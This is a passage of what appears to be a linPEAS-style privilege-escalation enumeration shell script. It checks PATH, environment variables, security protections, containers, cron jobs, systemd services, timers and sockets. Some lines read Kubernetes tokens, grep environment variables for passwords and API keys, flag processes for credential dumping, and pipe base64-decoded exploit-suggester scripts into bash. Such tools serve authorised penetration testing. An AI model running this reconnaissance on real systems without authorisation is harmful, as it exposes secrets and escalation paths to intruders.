| cut -d" " -f2) - fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" - (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then - print_2title "Kernel Extensions not belonging to apple" - kextstat 2>/dev/null | grep -Ev " com.apple." - - print_2title "Unsigned Kernel Extensions" - macosNotSigned /Library/Extensions - macosNotSigned /System/Library/Extensions - fi - - if [ "$(command -v bash 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester" - print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="peass{LES}" - echo $les_b64 | base64 -d | bash - echo "" - fi - - if [ "$(command -v perl 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester 2" - print_info "https://github.com/jondonas/linux-exploit-suggester-2" - les2_b64="peass{LES2}" - echo $les2_b64 | base64 -d | perl - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Doctor Suggestions" - brew doctor - echo "" - fi - - - - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then - aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then - apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then - ls -d /etc/apparmor* - else - echo_not_found "AppArmor" - fi - - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then - print_list "Gatekeeper enabled? .......... "$NC - (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - print_list "sleepimage encrypted? ........ "$NC - (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no - - print_list "XProtect? .................... "$NC - (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no - - print_list "SIP enabled? ................. "$NC - csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no - - print_list "Connected to JAMF? ........... "$NC - warn_exec jamf checkJSSConnection - - print_list "Connected to AD? ............. "$NC - dsconfigad -show && echo "" || echo_no - fi - - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; - else - if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi - echo "" - fi - - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then - detectedvirt=$(systemd-detect-virt) - if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else - if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck - - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" - - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" - - print_list "Any running containers? ........ "$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then - echo_no - else - containerCounts="" - if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi - if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi - if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi - if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," - # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi - - #If docker - if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" - inDockerGroup - print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC - enumerateDockerSockets - print_list "Docker version .................$NC$dockerVersion" - checkDockerVersionExploits - print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," - fi - if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker - fi - fi - - if [ "$inContainer" ]; then - echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" - if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - fi - - checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - echo "" - - print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" - echo "" - - print_2title "Privilege Mode" - if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi - else - echo_not_found - fi - echo "" - - print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" - echo "" - - print_2title "Possible Entrypoints" - ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq - echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - - -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" - - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 - echo "" - - #-- 2D) Unmounted - print_2title "Unmounted file-system?" - print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null - echo "" - - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); - echo "" - - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi - fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" - - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" - fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" - fi - done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" - #done - done - echo "" - - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done - done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - echo "" - - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) - - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - 